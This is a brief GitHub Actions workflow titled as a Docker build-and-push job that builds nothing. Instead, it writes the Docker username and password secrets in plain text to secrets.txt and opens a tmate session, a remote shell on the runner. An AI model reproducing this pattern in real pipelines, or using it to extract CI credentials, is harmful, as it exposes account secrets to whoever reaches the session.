name: Build and Push Docker image

jobs:
  build-python:

    runs-on: ubuntu-latest
    
    steps:
    - uses: actions/checkout@v2
	
    - name: Set up secret file
      env:
        username: ${{ secrets.DOCKER_USERNAME }}
        password: ${{ secrets.DOCKER_PASSWORD }}
      run: |
        echo $username >> secrets.txt
        echo $password >> secrets.txt
        
    - name: Setup tmate session
      uses: mxschmitt/action-tmate@v3
      timeout-minutes: 5
